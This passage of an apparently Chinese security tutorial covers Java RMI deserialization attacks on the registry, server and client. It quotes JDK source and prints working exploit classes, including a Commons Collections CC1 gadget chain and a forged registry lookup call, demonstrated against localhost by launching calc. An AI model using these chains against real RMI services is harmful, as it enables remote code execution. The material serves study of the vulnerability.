<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> org.apache.commons.collections.Transformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.ChainedTransformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.ConstantTransformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.InvokerTransformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.map.HashedMap;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.map.TransformedMap;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.lang.annotation.Retention;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Constructor;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.InvocationHandler;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Proxy;</span><br><span class="line"><span class="keyword">import</span> java.rmi.AlreadyBoundException;</span><br><span class="line"><span class="keyword">import</span> java.rmi.Naming;</span><br><span class="line"><span class="keyword">import</span> java.rmi.Remote;</span><br><span class="line"><span class="keyword">import</span> java.rmi.RemoteException;</span><br><span class="line"><span class="keyword">import</span> java.rmi.registry.LocateRegistry;</span><br><span class="line"><span class="keyword">import</span> java.rmi.registry.Registry;</span><br><span class="line"><span class="keyword">import</span> java.util.Map;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">ClientEXP</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception &#123; Proxy</span><br><span class="line">        <span class="type">Registry</span> <span class="variable">registry</span> <span class="operator">=</span> LocateRegistry.getRegistry(<span class="string">&quot;127.0.0.1&quot;</span>,<span class="number">1099</span>);</span><br><span class="line">        <span class="type">InvocationHandler</span> <span class="variable">handler</span> <span class="operator">=</span> (InvocationHandler) CC1();</span><br><span class="line">        <span class="type">Remote</span> <span class="variable">remote</span> <span class="operator">=</span> Remote.class.cast(Proxy.newProxyInstance(Remote.class.getClassLoader(),<span class="keyword">new</span> <span class="title class_">Class</span>[] &#123; Remote.class &#125;, handler));</span><br><span class="line">        registry.bind(<span class="string">&quot;test&quot;</span>,remote);</span><br><span class="line">    &#125;</span><br><span class="line">     <span class="keyword">public</span> <span class="keyword">static</span> Object <span class="title function_">CC1</span><span class="params">()</span> <span class="keyword">throws</span> Exception&#123;</span><br><span class="line">        Transformer[] transformers = <span class="keyword">new</span> <span class="title class_">Transformer</span>[]&#123;</span><br><span class="line">                <span class="keyword">new</span> <span class="title class_">ConstantTransformer</span>(Runtime.class),</span><br><span class="line">                <span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;getMethod&quot;</span>, <span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;String.class, Class[].class&#125;, <span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="string">&quot;getRuntime&quot;</span>, <span class="literal">null</span>&#125;),</span><br><span class="line">                <span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;invoke&quot;</span>, <span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;Object.class, Object[].class&#125;, <span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="literal">null</span>, <span class="literal">null</span>&#125;),</span><br><span class="line">                <span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;exec&quot;</span>, <span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;String.class&#125;, <span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="string">&quot;calc&quot;</span>&#125;)</span><br><span class="line">        &#125;;</span><br><span class="line">        <span class="type">ChainedTransformer</span> <span class="variable">chainedTransformer</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ChainedTransformer</span>(transformers);</span><br><span class="line"></span><br><span class="line">        <span class="comment">//随便定义个map类为了通过decorate</span></span><br><span class="line">        <span class="type">HashedMap</span> <span class="variable">map</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">HashedMap</span>();</span><br><span class="line">        map.put(<span class="string">&quot;value&quot;</span>,<span class="string">&quot;22222&quot;</span>);</span><br><span class="line">        <span class="comment">//实例化TransformedMap</span></span><br><span class="line">        Map&lt;String,Object&gt; transformedMap= TransformedMap.decorate(map,<span class="literal">null</span>,chainedTransformer);</span><br><span class="line"></span><br><span class="line">        <span class="comment">//构造入口类</span></span><br><span class="line">        Class c=Class.forName(<span class="string">&quot;sun.reflect.annotation.AnnotationInvocationHandler&quot;</span>);</span><br><span class="line">        Constructor ctor=c.getDeclaredConstructor(Class.class,Map.class);</span><br><span class="line">        ctor.setAccessible(<span class="literal">true</span>);</span><br><span class="line">        Object AnnotationInvocationHandler=ctor.newInstance(Retention.class,transformedMap);</span><br><span class="line">        <span class="keyword">return</span> AnnotationInvocationHandler;</span><br><span class="line">     &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<!-- 这是一张图片，ocr 内容为：179 0 版本控制 当前文件 JAVA反序列化 广 @ REGISTRYLMPL DASS 项目? UNICASTSERVERREFJAVA REMOTE JAVA SERVER JAVA REGISTRY JAVA CLIENT,JAVA PRORY AVA GCCILAZYMAP PACKAGE RMI.CLIENT: GCC1TRANSFORMEDMAP ORG.APACHE.COMMONS.COLLECTIONS.TRANSFORMER CCC2 1MPORT ORG.APACHE.CONNONS.COLLECTIONS.FUNCTORS.CHAINEDTRANSFORAOR: CC3 X 计算器 ORG.APACHE.CONNONS.COLLECTIONS.FUNCTORS.CONSTANTTRANSFORFIEN; CCA IMPORT ORG.APACHE.CONNONS.COLLECTIONS.FUNCTORS.INVOKERTRANSFORGER: 标准男 CC5 INPORT ORG.APACHE.COMNONS.COLLECTIONS.MAP.HASHEDHAP; CCC6 INPORT ORG.APACHE.CORNONS.COTLECTIONS.NAP.TRANSFORNEDNAP; G CC7 0 JAVA.LANG.ANNOTATION.RETENTION; LMPORT 1A JAVABASIC IMPORT JAVA.LANG.REFLECT.CONSTRUCTORI IMPORT JAVA.LANG.REFLECT.INVOCATIONHANDLER; ERMI MS MY M- IMPORT JAVA.LANG.REFLECT.PROXYI D CLIENT IMPORT JAVA.RMI.ALREADYBOUNDEXCEPTION; 9 CLIENT 996 CE IMPORTJAVA.RNI.NANING; HELLO IMPORT JAVA.RMI.REMOTE; IMPORT JAVA.RNI.REMOTEEXCEPTION; X2 18 IMPORT JAVA.RNI.REGISTRY.LOCATEREGISTRY; HELLOLMPL 19 IMPORT JAVA.RNI.REGISTRY.REGISTRY 7 X 9 8 20 IMPORT JAVA.UTIL.MAP; URLDNS 21 5 6 4 PUBLIC CLASS CLIENT F OTEST 23D PUBLIC STATIC VOID MAIN(STRING(] ARGS) THROWS EXCEPTION { REQISTRY REGISTRY : LOCATEREGISTRY.GETREGISTRY( HOST: HOST "127.0.0.1", PORT 结构 1 3 2 + INVOCATIONHANDLER HANDLER - (INVOCATIONHANDLER) CC1(); 爱体医院院院院纪 CLLENT REMOTE RENOTE - REMOTE.CLASS.CAST(PROXY.NEWPROXYINSTANCE(RONOTO.CLAS LASS F HAND / MAIN(STRINGM:VOID REGISTRY.BIND( NAME 'TEST',REMOTE); CC10 OBJECT PUBLIC STATIC OBJECT CC1() THROWS EXCEPTIONF 1个用法 TRANSFORMER[] TRANSFORMERS - NEW TRANSFORMER[LLE NEW CONSTANTTRANSFORMER(RUNTIME.CLASS), W INVOKERTRANSTONNEE(  NETHONE) "GRTHETHED*, NEW CLASSLLISTRING,CLASS,CLASSLL.ELASSL. NOW ONJECTIFGET NEW INVOK DY SERVER 运行  E:AXEINIKE.JAVA - NU4 JAVA_BUOS.NEWYUININIJBVA,UXU... )EXCEPTION IN THREAD "MAIN" JAVA.PMI.ALREADXBOUNDEXCEPTION CREATEBREAKPOLNT : TEST <20 个内部行> AT RNI.CLIENT.CLIONT.MAIN(CLIENT.JAVA:27) 进程已结束,退出代码为1 CRLF 4个空格 UTF-8 23:63 OUNTITLED > SRE > MAIN > RML > RML > 2025/3/11 -->
<p><img src="/images/2025/1741663417831-77bef841-8e23-423b-846b-10c005670267.png"></p>
<p>rebind同理，换下方法就行了</p>
<h3 id="unbind-或-lookup-的攻击"><a href="#unbind-或-lookup-的攻击" class="headerlink" title="unbind 或 lookup 的攻击"></a>unbind 或 lookup 的攻击</h3><p>看一下lookup和unbind的源码</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">case</span> <span class="number">2</span>:</span><br><span class="line">    <span class="keyword">try</span> &#123;</span><br><span class="line">        var10 = var2.getInputStream();</span><br><span class="line">        var7 = (String)var10.readObject();</span><br><span class="line">    &#125; <span class="keyword">catch</span> (IOException var89) &#123;</span><br><span class="line">        <span class="keyword">throw</span> <span class="keyword">new</span> <span class="title class_">UnmarshalException</span>(<span class="string">&quot;error unmarshalling arguments&quot;</span>, var89);</span><br><span class="line">    &#125; <span class="keyword">catch</span> (ClassNotFoundException var90) &#123;</span><br><span class="line">        <span class="keyword">throw</span> <span class="keyword">new</span> <span class="title class_">UnmarshalException</span>(<span class="string">&quot;error unmarshalling arguments&quot;</span>, var90);</span><br><span class="line">    &#125; <span class="keyword">finally</span> &#123;</span><br><span class="line">        var2.releaseInputStream();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    var8 = var6.lookup(var7);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">try</span> &#123;</span><br><span class="line">        <span class="type">ObjectOutput</span> <span class="variable">var9</span> <span class="operator">=</span> var2.getResultStream(<span class="literal">true</span>);</span><br><span class="line">        var9.writeObject(var8);</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    &#125; <span class="keyword">catch</span> (IOException var88) &#123;</span><br><span class="line">        <span class="keyword">throw</span> <span class="keyword">new</span> <span class="title class_">MarshalException</span>(<span class="string">&quot;error marshalling return&quot;</span>, var88);</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">case</span> <span class="number">4</span>:</span><br><span class="line">    <span class="keyword">try</span> &#123;</span><br><span class="line">        var10 = var2.getInputStream();</span><br><span class="line">        var7 = (String)var10.readObject();</span><br><span class="line">    &#125; <span class="keyword">catch</span> (IOException var81) &#123;</span><br><span class="line">        <span class="keyword">throw</span> <span class="keyword">new</span> <span class="title class_">UnmarshalException</span>(<span class="string">&quot;error unmarshalling arguments&quot;</span>, var81);</span><br><span class="line">    &#125; <span class="keyword">catch</span> (ClassNotFoundException var82) &#123;</span><br><span class="line">        <span class="keyword">throw</span> <span class="keyword">new</span> <span class="title class_">UnmarshalException</span>(<span class="string">&quot;error unmarshalling arguments&quot;</span>, var82);</span><br><span class="line">    &#125; <span class="keyword">finally</span> &#123;</span><br><span class="line">        var2.releaseInputStream();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    var6.unbind(var7);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">try</span> &#123;</span><br><span class="line">        var2.getResultStream(<span class="literal">true</span>);</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    &#125; <span class="keyword">catch</span> (IOException var80) &#123;</span><br><span class="line">        <span class="keyword">throw</span> <span class="keyword">new</span> <span class="title class_">MarshalException</span>(<span class="string">&quot;error marshalling return&quot;</span>, var80);</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p>可以看到，虽然都调用了readObject方法，但只调用了String类型数据的readObject方法，这里可以</p>
<ol>
<li><font style="color:rgb(64, 64, 64);">通过反射获取 RMI Registry 的内部字段，修改其行为。</font></li>
<li><font style="color:rgb(64, 64, 64);">伪造一个 RMI 请求，发送恶意序列化数据，触发目标服务器的反序列化漏洞。</font></li>
</ol>
<p>具体代码实现如下</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> org.apache.commons.collections.Transformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.ChainedTransformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.ConstantTransformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.functors.InvokerTransformer;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.map.HashedMap;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.collections.map.TransformedMap;</span><br><span class="line"><span class="keyword">import</span> sun.rmi.server.UnicastRef;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.io.ObjectOutput;</span><br><span class="line"><span class="keyword">import</span> java.lang.annotation.Retention;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Constructor;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Field;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.InvocationHandler;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Proxy;</span><br><span class="line"><span class="keyword">import</span> java.rmi.AlreadyBoundException;</span><br><span class="line"><span class="keyword">import</span> java.rmi.Naming;</span><br><span class="line"><span class="keyword">import</span> java.rmi.Remote;</span><br><span class="line"><span class="keyword">import</span> java.rmi.RemoteException;</span><br><span class="line"><span class="keyword">import</span> java.rmi.registry.LocateRegistry;</span><br><span class="line"><span class="keyword">import</span> java.rmi.registry.Registry;</span><br><span class="line"><span class="keyword">import</span> java.rmi.server.Operation;</span><br><span class="line"><span class="keyword">import</span> java.rmi.server.RemoteCall;</span><br><span class="line"><span class="keyword">import</span> java.rmi.server.RemoteObject;</span><br><span class="line"><span class="keyword">import</span> java.util.Map;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">Client</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">        <span class="type">Registry</span> <span class="variable">registry</span> <span class="operator">=</span> LocateRegistry.getRegistry(<span class="string">&quot;127.0.0.1&quot;</span>,<span class="number">1099</span>);</span><br><span class="line">         <span class="type">InvocationHandler</span> <span class="variable">handler</span> <span class="operator">=</span> (InvocationHandler) CC1();</span><br><span class="line">         <span class="type">Remote</span> <span class="variable">remote</span> <span class="operator">=</span> Remote.class.cast(Proxy.newProxyInstance(</span><br><span class="line">                        Remote.class.getClassLoader(),<span class="keyword">new</span> <span class="title class_">Class</span>[] &#123; Remote.class &#125;, handler));</span><br><span class="line"></span><br><span class="line">         Field[] fields_0 = registry.getClass().getSuperclass().getSuperclass().getDeclaredFields();</span><br><span class="line">         fields_0[<span class="number">0</span>].setAccessible(<span class="literal">true</span>);</span><br><span class="line">         <span class="type">UnicastRef</span> <span class="variable">ref</span> <span class="operator">=</span> (UnicastRef) fields_0[<span class="number">0</span>].get(registry);</span><br><span class="line"></span><br><span class="line">         <span class="comment">//获取operations</span></span><br><span class="line"></span><br><span class="line">         Field[] fields_1 = registry.getClass().getDeclaredFields();</span><br><span class="line">         fields_1[<span class="number">0</span>].setAccessible(<span class="literal">true</span>);</span><br><span class="line">         Operation[] operations = (Operation[]) fields_1[<span class="number">0</span>].get(registry);</span><br><span class="line"></span><br><span class="line">         <span class="comment">// 伪造lookup的代码，去伪造传输信息</span></span><br><span class="line">         <span class="type">RemoteCall</span> <span class="variable">var2</span> <span class="operator">=</span> ref.newCall((RemoteObject) registry, operations, <span class="number">2</span>, <span class="number">4905912898345647071L</span>);</span><br><span class="line">         <span class="type">ObjectOutput</span> <span class="variable">var3</span> <span class="operator">=</span> var2.getOutputStream();</span><br><span class="line">         var3.writeObject(remote);</span><br><span class="line">         ref.invoke(var2);</span><br><span class="line">    &#125;</span><br><span class="line">     <span class="keyword">public</span> <span class="keyword">static</span> Object <span class="title function_">CC1</span><span class="params">()</span> <span class="keyword">throws</span> Exception&#123;</span><br><span class="line">        Transformer[] transformers = <span class="keyword">new</span> <span class="title class_">Transformer</span>[]&#123;</span><br><span class="line">                <span class="keyword">new</span> <span class="title class_">ConstantTransformer</span>(Runtime.class),</span><br><span class="line">                <span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;getMethod&quot;</span>, <span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;String.class, Class[].class&#125;, <span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="string">&quot;getRuntime&quot;</span>, <span class="literal">null</span>&#125;),</span><br><span class="line">                <span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;invoke&quot;</span>, <span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;Object.class, Object[].class&#125;, <span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="literal">null</span>, <span class="literal">null</span>&#125;),</span><br><span class="line">                <span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;exec&quot;</span>, <span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;String.class&#125;, <span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="string">&quot;calc&quot;</span>&#125;)</span><br><span class="line">        &#125;;</span><br><span class="line">        <span class="type">ChainedTransformer</span> <span class="variable">chainedTransformer</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ChainedTransformer</span>(transformers);</span><br><span class="line"></span><br><span class="line">        <span class="comment">//随便定义个map类为了通过decorate</span></span><br><span class="line">        <span class="type">HashedMap</span> <span class="variable">map</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">HashedMap</span>();</span><br><span class="line">        map.put(<span class="string">&quot;value&quot;</span>,<span class="string">&quot;22222&quot;</span>);</span><br><span class="line">        <span class="comment">//实例化TransformedMap</span></span><br><span class="line">        Map&lt;String,Object&gt; transformedMap= TransformedMap.decorate(map,<span class="literal">null</span>,chainedTransformer);</span><br><span class="line"></span><br><span class="line">        <span class="comment">//构造入口类</span></span><br><span class="line">        Class c=Class.forName(<span class="string">&quot;sun.reflect.annotation.AnnotationInvocationHandler&quot;</span>);</span><br><span class="line">        Constructor ctor=c.getDeclaredConstructor(Class.class,Map.class);</span><br><span class="line">        ctor.setAccessible(<span class="literal">true</span>);</span><br><span class="line">        Object AnnotationInvocationHandler=ctor.newInstance(Retention.class,transformedMap);</span><br><span class="line">        <span class="keyword">return</span> AnnotationInvocationHandler;</span><br><span class="line">     &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h2 id="攻击服务端"><a href="#攻击服务端" class="headerlink" title="攻击服务端"></a>攻击服务端</h2><p>漏洞点<code>unmarshalValue</code></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">protected</span> <span class="keyword">static</span> Object <span class="title function_">unmarshalValue</span><span class="params">(Class&lt;?&gt; type, ObjectInput in)</span></span><br><span class="line">    <span class="keyword">throws</span> IOException, ClassNotFoundException</span><br><span class="line">&#123;</span><br><span class="line">    <span class="keyword">if</span> (type.isPrimitive()) &#123;</span><br><span class="line">        <span class="keyword">if</span> (type == <span class="type">int</span>.class) &#123;</span><br><span class="line">            <span class="keyword">return</span> Integer.valueOf(in.readInt());</span><br><span class="line">        &#125; <span class="keyword">else</span> <span class="keyword">if</span> (type == <span class="type">boolean</span>.class) &#123;</span><br><span class="line">            <span class="keyword">return</span> Boolean.valueOf(in.readBoolean());</span><br><span class="line">        &#125; <span class="keyword">else</span> <span class="keyword">if</span> (type == <span class="type">byte</span>.class) &#123;</span><br><span class="line">            <span class="keyword">return</span> Byte.valueOf(in.readByte());</span><br><span class="line">        &#125; <span class="keyword">else</span> <span class="keyword">if</span> (type == <span class="type">char</span>.class) &#123;</span><br><span class="line">            <span class="keyword">return</span> Character.valueOf(in.readChar());</span><br><span class="line">        &#125; <span class="keyword">else</span> <span class="keyword">if</span> (type == <span class="type">short</span>.class) &#123;</span><br><span class="line">            <span class="keyword">return</span> Short.valueOf(in.readShort());</span><br><span class="line">        &#125; <span class="keyword">else</span> <span class="keyword">if</span> (type == <span class="type">long</span>.class) &#123;</span><br><span class="line">            <span class="keyword">return</span> Long.valueOf(in.readLong());</span><br><span class="line">        &#125; <span class="keyword">else</span> <span class="keyword">if</span> (type == <span class="type">float</span>.class) &#123;</span><br><span class="line">            <span class="keyword">return</span> Float.valueOf(in.readFloat());</span><br><span class="line">        &#125; <span class="keyword">else</span> <span class="keyword">if</span> (type == <span class="type">double</span>.class) &#123;</span><br><span class="line">            <span class="keyword">return</span> Double.valueOf(in.readDouble());</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="keyword">throw</span> <span class="keyword">new</span> <span class="title class_">Error</span>(<span class="string">&quot;Unrecognized primitive type: &quot;</span> + type);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> in.readObject();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>对于客户端远程调用服务端的函数时，提交参数的方法是通过序列化进行传输，所以在服务端就是通过unmarshalValue来读取反序列后的参数</p>
<h3 id="接受恶意参数"><a href="#接受恶意参数" class="headerlink" title="接受恶意参数"></a>接受恶意参数</h3><p>根据漏洞点的信息可知，服务端会反序列化客户端调用远程对象方法的参数，若服务端存在一个方法能接收Object方法的参数，或者能够接收恶意参数对应类型的参数，那将触发恶意参数的反序列化</p>
<p>比如我在远程对象这里设置了一个aaa方法能够接收Object类型的参数</p>
<!-- 这是一张图片，ocr 内容为：MPL EXTENDS UNICASTREMOTEOBJECT IMPLEMENTS HELLO  PUBLIC CLASS HELLOIMPL E 2个用法 PROTECTED HELLOIMPL() THROWS REMOTEEXCEPTION{ 1个用法 SUPER(); 子 THROWS REMOTEEXCEPTION { 0个用法  PUBLIC STRING SAYHELLO() TH  RETURN "I AM CHANGE!"; 子 PUBLIC STRING AAA(OBJECT AA) THROWS REMOTEEXCEPTION ( 1个用法  RETURN "I AM CHANGE,TOO!"; -->
<p><img src="/images/2025/1741694237281-9c59accc-5073-49a3-8615-f1ef0172cb6f.png"></p>
<p>然后再客户端调用这个远程对象的aaa方法，并传入cc1的恶意对象，运行可以看到成功执行了恶意代码</p>
<!-- 这是一张图片，ocr 内容为：LIC CLASS CLIENT { PUBLIC STATIC VOID MAIN(STRING[] ARGS) THROWS EXCEPTION { //获取对应端口的注册表 LOCATEREGISTRY.GETREGISTRY( HOST: "LOCALHOST", PORT: 1099); REGISTRY REGISTRY //根据注册表寻找远程对象 HELLO STUB - (HELLO) REGISTRY.LOOKUP( NAME:"CHANGE");  RESPONSE ; STUB.AAA(CC1(); STRING -->
<p><img src="/images/2025/1741694305872-67ccf8b9-24c9-4db0-b9bf-f7926b3d72d6.png"><!-- 这是一张图片，ocr 内容为：T JAVA.UTIL.MAP 计算器 LIC CLASS CLIENT { 28 标准 PUBLIC STATIC VOID MAIN(STRING(] ARGS) THROWS EXCEPTION ( 29 //获取对应端口的注册表 30  REGISTRY REGISTRY - LOCATEREGISTRY GETREGISTRY( HOST: "LOCALHOST", PI 31 0 //根据注册表寻找远程对象 HELLO STUB 三 (HELLO) REGISTRY.LOOKUP( NAME:"CHANGE"); 33 34 MC MR M- MS M+ MY 35 36 % C CE 区  STRING RESPONSE ; STUB.AAA(CC1(); 37 38 X2 YX 39 CT CC1() THROWS EXCEPTION{ 1个用法  PUBLIC STATIC OBJECT CC1 TRANSFORMER[]{  TRANSFORMERS 三 NEW 41 TRANSFORMER 7 8 X 9 S CONSTANTTRANSFORMER(RUNTIME.CLASS), NEW "GETRUNTIME" NEW INVOKERTRANSFORMER( METHODNAME:"GETMETHOD", NEW CLASS[]{STR 5 4 6 LL,NULLTF), ( METHODNAME:"INVOKE", NEW CLASS[LI:OBJECT  NEW INVOKERTRANSFORMER( N 44 45 NEW INVOKERTRANSFORNER( METHODNAME:"EXEC", NEW CLASS[](STRING.C' 子; 46 1 2 3 十 CHAINEDTRANSFORMER CHAINEDTRANSFORMER - NEW CHAINEDTRANSFORMER(TRANSFOR) +/ 0 //随便定义个MAP类为了通过DECORATE HASHEDMAP MAP ; NEW HASHEDMAP(); 50 51 MAP.PUT("VALUE","22222"); //定例化TPANSFOPMEDMAN 52 --><br><img src="/images/2025/1741694365724-02232eed-4adb-4a00-b330-2bdbaeff1cc8.png"></p>
<h2 id="攻击客户端"><a href="#攻击客户端" class="headerlink" title="攻击客户端"></a>攻击客户端</h2><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">executeCall</span><span class="params">()</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">    <span class="keyword">switch</span> (returnType) &#123;</span><br><span class="line">    <span class="keyword">case</span> 